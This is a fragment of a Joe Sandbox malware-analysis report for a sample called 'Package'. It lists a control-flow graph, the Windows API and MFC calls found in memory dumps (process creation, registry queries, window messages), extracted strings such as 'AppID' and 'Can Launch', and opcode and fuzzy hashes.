                                                                          control_flow_graph 586 6e2f5a1d-6e2f5a29 587 6e2f5a2b-6e2f5a3f call 6e2f55ef call 6e2f550e 586->587 588 6e2f5a40-6e2f5a44 586->588 588->587 589 6e2f5a46-6e2f5a4a 588->589 591 6e2f5a4c-6e2f5a54 call 6e2f55dc 589->591 592 6e2f5a56-6e2f5a7b call 6e2f99d5 589->592 591->587 600 6e2f5a7d-6e2f5a92 call 6e2f5602 * 2 592->600 601 6e2f5a94-6e2f5ab4 call 6e2f5d5f 592->601 615 6e2f5ad7-6e2f5ad9 600->615 606 6e2f5ade-6e2f5ae5 601->606 607 6e2f5ab6-6e2f5ad4 call 6e2f5602 * 3 601->607 610 6e2f5aea-6e2f5b3a call 6e2f55dc call 6e2f2010 call 6e2f99e0 606->610 611 6e2f5ae7-6e2f5ae9 606->611 607->615 626 6e2f5b3c-6e2f5b42 610->626 627 6e2f5b86-6e2f5b95 GetLastError call 6e2f5595 610->627 611->610 617 6e2f5c1d-6e2f5c20 615->617 628 6e2f5b48-6e2f5b4a 626->628 629 6e2f5c21-6e2f5c28 call 6e2f4293 626->629 639 6e2f5b9e-6e2f5ba0 627->639 640 6e2f5b97-6e2f5b98 CloseHandle 627->640 631 6e2f5b4c-6e2f5b63 WaitForSingleObject GetExitCodeProcess 628->631 632 6e2f5bab-6e2f5bae 628->632 631->627 637 6e2f5b65-6e2f5b6d 631->637 635 6e2f5bec-6e2f5bee 632->635 636 6e2f5bb0-6e2f5bb2 632->636 647 6e2f5bf7-6e2f5c17 call 6e2f5602 * 3 635->647 648 6e2f5bf0-6e2f5bf1 CloseHandle 635->648 643 6e2f5bbb-6e2f5bbd 636->643 644 6e2f5bb4-6e2f5bb5 CloseHandle 636->644 645 6e2f5b6f-6e2f5b70 CloseHandle 637->645 646 6e2f5b76-6e2f5b78 637->646 641 6e2f5bc8-6e2f5bea call 6e2f5602 * 3 639->641 642 6e2f5ba2-6e2f5ba9 CloseHandle 639->642 640->639 665 6e2f5c19-6e2f5c1c 641->665 642->641 650 6e2f5bbf-6e2f5bc0 CloseHandle 643->650 651 6e2f5bc6 643->651 644->643 645->646 653 6e2f5b7a-6e2f5b7b CloseHandle 646->653 654 6e2f5b81-6e2f5b84 646->654 647->665 648->647 650->651 651->641 653->654 654->641 665->617
                                                                          APIs
                                                                            • Part of subcall function 6E2F5602: HeapFree.KERNEL32(00000000,00000000,?,6E2F4C74), ref: 6E2F5618
                                                                            • Part of subcall function 6E2F5602: GetLastError.KERNEL32(?,?,6E2F4C74), ref: 6E2F5623
                                                                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B4E
                                                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 6E2F5B5B
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B70
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B7B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B86
                                                                          • __dosmaperr.LIBCMT ref: 6E2F5B8D
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5B98
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BA3
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BB5
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BC0
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2F5BF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                          • String ID:
                                                                          • API String ID: 2764183375-0
                                                                          • Opcode ID: 12ad8ae8b7a9c3fd29a32809b2e7e712e1cb1a431fd1e91672070c8d34303330
                                                                          • Instruction ID: e230bdc4e5c8bd3d60342c5b54153207339588aaf7128da9915a6197edd21242
                                                                          • Opcode Fuzzy Hash: 12ad8ae8b7a9c3fd29a32809b2e7e712e1cb1a431fd1e91672070c8d34303330
                                                                          • Instruction Fuzzy Hash: 8E518B758C020EEFDF019FD0C899EEEFBBBAF4531AF108455E812A6140DB318E52DA65
                                                                          APIs
                                                                          • #5491.MFC42U ref: 00D30DA3
                                                                          • #4451.MFC42U(?), ref: 00D30DAD
                                                                          • #2112.MFC42U(?,50002800,0000E800,?), ref: 00D30DCE
                                                                          • #4158.MFC42U(00000002,?,50002800,0000E800,?), ref: 00D30DDF
                                                                          • #5867.MFC42U(?,00000002,?,50002800,0000E800,?), ref: 00D30DF4
                                                                          • #2109.MFC42U(?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00D30E0C
                                                                          • #5996.MFC42U(00D439A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00D30E1E
                                                                          • #3477.MFC42U(00000000,?,?,?,00D439A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00D30E37
                                                                          • #6063.MFC42U(00000000,00000000,?,?,00000000,?,?,?,00D439A0,00000001,?,50008200,0000E801,?,00000002), ref: 00D30E4E
                                                                          • #2550.MFC42U(00000001,00000000,00000000,?,?,00000000,?,?,?,00D439A0,00000001,?,50008200,0000E801,?,00000002), ref: 00D30E57
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2109#2112#2550#3477#4158#4451#5491#5867#5996#6063
                                                                          • String ID:
                                                                          • API String ID: 1972827604-0
                                                                          • Opcode ID: e2d393b4d66a16cb7c0b0a16f9508f4134ca6e472ce5013895e4c880f0395535
                                                                          • Instruction ID: 2bba8792dc12058a91bf1e98eb9afa939916303690b14a0aa85b18c8762cc6bd
                                                                          • Opcode Fuzzy Hash: e2d393b4d66a16cb7c0b0a16f9508f4134ca6e472ce5013895e4c880f0395535
                                                                          • Instruction Fuzzy Hash: F211E23531021876EE1662608C56FAFB79EDFC4710F180A24B917F62C2DFA0AA0486B4
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D30CCD
                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00D30CF8
                                                                          • SendMessageW.USER32(?,00001061,00000001,?), ref: 00D30D1C
                                                                          • #2634.MFC42U(00000000), ref: 00D30D2A
                                                                          • #2634.MFC42U(00000000,00000000), ref: 00D30D37
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2634MessageSend$#4704
                                                                          • String ID: Can Launch$User/Group$j
                                                                          • API String ID: 3599582684-3481516568
                                                                          • Opcode ID: a66d01e9bbeb7b05a7fe51e61bb0f13bec30b74fa0938c12910d2ab232b65f9b
                                                                          • Instruction ID: 19b50748ad5e4484020d86198eff756914fcb63c8f2367709c52129d605e0b35
                                                                          • Opcode Fuzzy Hash: a66d01e9bbeb7b05a7fe51e61bb0f13bec30b74fa0938c12910d2ab232b65f9b
                                                                          • Instruction Fuzzy Hash: 1B014F71900318ABEB209FA0DC45FEFBBB8EB45714F000419F515B62D0DBB56985CBB1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                          • String ID:
                                                                          • API String ID: 2849151604-0
                                                                          • Opcode ID: d5c8eb705918bebf7ae9d9858d6bfe28da6d30507443b015dddecb45af8b0926
                                                                          • Instruction ID: aa3ce83a2754c2fee18c14ed8533da32142bbf86fff643e177c82fc5d7a36909
                                                                          • Opcode Fuzzy Hash: d5c8eb705918bebf7ae9d9858d6bfe28da6d30507443b015dddecb45af8b0926
                                                                          • Instruction Fuzzy Hash: BA41DE7AA443659FDB249F68E80576A77A1FB55B20F18423AF841E73D0CBB08D81CB70
                                                                          APIs
                                                                          • _strrchr.LIBCMT ref: 6E2F586D
                                                                          • _strrchr.LIBCMT ref: 6E2F5877
                                                                          • _strrchr.LIBCMT ref: 6E2F588C
                                                                            • Part of subcall function 6E2F5602: HeapFree.KERNEL32(00000000,00000000,?,6E2F4C74), ref: 6E2F5618
                                                                            • Part of subcall function 6E2F5602: GetLastError.KERNEL32(?,?,6E2F4C74), ref: 6E2F5623
                                                                            • Part of subcall function 6E2F551E: IsProcessorFeaturePresent.KERNEL32(00000017,6E2F550D,?,6E2F8FEA,?,6E2F8E7D,00000000,?,00000000,?,6E2F5484,?,00000000,6E2F8E7D,?,6E2F8FEA), ref: 6E2F5520
                                                                            • Part of subcall function 6E2F551E: GetCurrentProcess.KERNEL32(C0000417,6E2F8FEA,?,00000000,?,00000000,?,?,6E2F8FEA,?,6E2F8E7D,00000000,?,00000000,6E2F8E7D,?), ref: 6E2F5543
                                                                            • Part of subcall function 6E2F551E: TerminateProcess.KERNEL32(00000000,?,6E2F8FEA,?,6E2F8E7D,00000000,?,00000000,6E2F8E7D,?,00000000,00000000,6E304988,0000002C,6E2F8EEE,?), ref: 6E2F554A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                          • String ID: .com
                                                                          • API String ID: 3694955208-4200470757
                                                                          • Opcode ID: f282d27ad773841ca7a4f7397c51f840f5eba7fff1f880eee156e6a86857a71d
                                                                          • Instruction ID: dbd53f4880ee9a842489f446c7f4db4812bdbaa6a545a2b2b58b350a49331d86
                                                                          • Opcode Fuzzy Hash: f282d27ad773841ca7a4f7397c51f840f5eba7fff1f880eee156e6a86857a71d
                                                                          • Instruction Fuzzy Hash: 8C511A765D420EEBE7054AF49C91F9BFB6FAF42778F108919E8109B185FB21DD0386A0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$wsprintf
                                                                          • String ID: APPID\%s$AppID
                                                                          • API String ID: 3128662910-1823611323
                                                                          • Opcode ID: 09605909f06430a2cd855f18b4b123f686d44d7bff5788bd38b3af1d36716238
                                                                          • Instruction ID: 8e4100b1b1d993a12a246a8bb1183bab9c69a076256dbda6a318999a48c0c1a8
                                                                          • Opcode Fuzzy Hash: 09605909f06430a2cd855f18b4b123f686d44d7bff5788bd38b3af1d36716238
                                                                          • Instruction Fuzzy Hash: 3F016DB5900318AFCB10EF24DC4AE9B7BBCEB19704F104195B915A3242D674AE888FB0
                                                                          APIs
                                                                          • #2244.MFC42U(?,00000001,00000002,50000000,0000E900), ref: 00D316E1
                                                                          • #3476.MFC42U(00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D31744
                                                                          • #3476.MFC42U(00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D31755
                                                                          • #5848.MFC42U(00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D3175D
                                                                          • #5906.MFC42U(00000000,000000F0,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00D3176B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #3476$#2244#5848#5906
                                                                          • String ID:
                                                                          • API String ID: 2288433627-0
                                                                          • Opcode ID: 473ed184f702c54aa5e6e01796191d227550c68f84ae3ac8830753ac79ca208d
                                                                          • Instruction ID: 20d93f33988dfa75ee0724be2a66d3598b512bebe280553bf7426b74c9ba500d
                                                                          • Opcode Fuzzy Hash: 473ed184f702c54aa5e6e01796191d227550c68f84ae3ac8830753ac79ca208d
                                                                          • Instruction Fuzzy Hash: EF11A7353813257BEA245B614C49FBBBB5EDF857A0F080425BD06EB3C1DEA09C00C6B0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D3153D
                                                                          • #366.MFC42U(00000004,00D30D8A,00000004), ref: 00D31547
                                                                          • #527.MFC42U(00000004,00D30D8A,00000004), ref: 00D3155C
                                                                          • #529.MFC42U(00000004,00D30D8A,00000004), ref: 00D3156B
                                                                          • #554.MFC42U(00000004,00D30D8A,00000004), ref: 00D3157A
                                                                            • Part of subcall function 00D315A4: #439.MFC42U ref: 00D315B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #366#439#527#529#554H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 3098594135-0
                                                                          • Opcode ID: 6bf0d51a93ed43be3e532e5de8bb9dd064deed621144b856d8bec41f6e41a435
                                                                          • Instruction ID: 58c03c03a3aad4281dc87a37959198a381ba7a0d862c4f515c2c442a81405d75
                                                                          • Opcode Fuzzy Hash: 6bf0d51a93ed43be3e532e5de8bb9dd064deed621144b856d8bec41f6e41a435
                                                                          • Instruction Fuzzy Hash: 02F03A70805794CBE711EBA0C0167DDF7A0EF24305F50448CE5DA032C2DBB42608CB72
                                                                          APIs
                                                                            • Part of subcall function 00D33F53: #303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00D33D6D,23685920,?,00000000,00D40996,000000FF,?,00D32096), ref: 00D33F69
                                                                          • #540.MFC42U(23685920,?,00000000,00D40996,000000FF,?,00D32096), ref: 00D33D80
                                                                          • #1105.MFC42U(00D35270,000000FF,00000000,00000000,00000004,00000000), ref: 00D33E62
                                                                            • Part of subcall function 00D33CFC: #543.MFC42U(00000000,?,00000000,?,00D33E30), ref: 00D33D0A
                                                                            • Part of subcall function 00D33CFC: InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00D33E30), ref: 00D33D19
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1105#303#540#543CriticalInitializeSection
                                                                          • String ID: Yh#
                                                                          • API String ID: 4030040872-3982030272
                                                                          • Opcode ID: 176d5b2f20e3f38c9a28c77dfc2e29d62be7d4dab5322008ea63fc6b48c1ea8e
                                                                          • Instruction ID: ecc0b3550180b802d1c79bb5b9bf6714ef0a14ea79bc94128591e8e01cd47b32
                                                                          • Opcode Fuzzy Hash: 176d5b2f20e3f38c9a28c77dfc2e29d62be7d4dab5322008ea63fc6b48c1ea8e
                                                                          • Instruction Fuzzy Hash: B041D671E10359DFDB01DF98C956BAEBBF0FB04325F104559E421AB2A1C3B99A44CF64
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: c6ef9381d8f8f8055e9d97403821ab2835a68ca680b9a6248b0cde96ca34584b
                                                                          • Instruction ID: 4959baec1c15e4501ae835861e1f69217da6cf4d8dd98af8d3548bbcaa99e052
                                                                          • Opcode Fuzzy Hash: c6ef9381d8f8f8055e9d97403821ab2835a68ca680b9a6248b0cde96ca34584b
                                                                          • Instruction Fuzzy Hash: 09F0B27990020DFFDF128F90ED09F9E7FBAEB49344F104065FA01A2260E771DA60AB60
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,6E2F4161,6E2F1014,6E2F1014,?,00000000,7763BC5F,6E2F1014,00000000), ref: 6E2F4178
                                                                          • TerminateProcess.KERNEL32(00000000,?,6E2F4161,6E2F1014,6E2F1014,?,00000000,7763BC5F,6E2F1014,00000000), ref: 6E2F417F
                                                                          • ExitProcess.KERNEL32 ref: 6E2F4191
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 21723b206f888eaabd0af5dd4ec8319090398e2a3b85cb468bbfb39eda9d14ba
                                                                          • Instruction ID: 5e8e28da176dd76a9c8bea0a81d5e4ca9b3c15605ae59312a77f087c54934f2a
                                                                          • Opcode Fuzzy Hash: 21723b206f888eaabd0af5dd4ec8319090398e2a3b85cb468bbfb39eda9d14ba
                                                                          • Instruction Fuzzy Hash: CED09E3508050CFBEF012FA0D90CC8B7F6BEF517657244514B91A49025DFB19997DAA4
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1662#2644
                                                                          • String ID:
                                                                          • API String ID: 3643970462-0
                                                                          • Opcode ID: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
                                                                          • Instruction ID: c4ee434a47aa921f54b2fca977dea3da648e16bf6aa39587b5c32b5bb8fa88f0
                                                                          • Opcode Fuzzy Hash: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
                                                                          • Instruction Fuzzy Hash: C5416034A10608EFCB55DF94C696DACBBB1EF44324F658498E881AB351D771EF41DB20
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: _callnewhmalloc
                                                                          • String ID:
                                                                          • API String ID: 2285944120-0
                                                                          • Opcode ID: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
                                                                          • Instruction ID: 502f5d055a1d5df791e7b0a741347b5d20f312fc4ab3005422dc101f62f0c09c
                                                                          • Opcode Fuzzy Hash: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
                                                                          • Instruction Fuzzy Hash: 13D0A73260012A334A312655FC0045B7E0ADA52BF0F190031F84CAE215DA11CD1086F0
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D395D5
                                                                            • Part of subcall function 00D2B421: #1172.MFC42U(?,00D2B338), ref: 00D2B424
                                                                            • Part of subcall function 00D39597: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D395A0
                                                                            • Part of subcall function 00D39597: #2855.MFC42U(00000000), ref: 00D395A7
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D395FC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#1172#2855#4704
                                                                          • String ID:
                                                                          • API String ID: 854760084-0
                                                                          • Opcode ID: 5bab8667c5209f300e2a6e4169ea23453eddbb8aa01ec999f0ac333b621131dc
                                                                          • Instruction ID: 2d001528776214ffffa2bf5514cc8facf8fc5374e9c734236e97b91c1b3e7320
                                                                          • Opcode Fuzzy Hash: 5bab8667c5209f300e2a6e4169ea23453eddbb8aa01ec999f0ac333b621131dc
                                                                          • Instruction Fuzzy Hash: A1D017322222205BE7217BB4EC59FA66699EF86320F0A4461B955DA1A2CEA0DC818670
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6E2F9A95
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 1c010df3e7424c9dff2b264bd105920ea3781d65ed984645e17e59a8ada74447
                                                                          • Instruction ID: dfc96bed7cf477b51323f82aa90e682f9029ebafb2f75a7526ae21d7968af571
                                                                          • Opcode Fuzzy Hash: 1c010df3e7424c9dff2b264bd105920ea3781d65ed984645e17e59a8ada74447
                                                                          • Instruction Fuzzy Hash: 4231EAB1C5425EEFDF018FE9D9809DEFFBABF08214F54406AE918A2110D7318956CB90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #4435
                                                                          • String ID:
                                                                          • API String ID: 3199213920-0
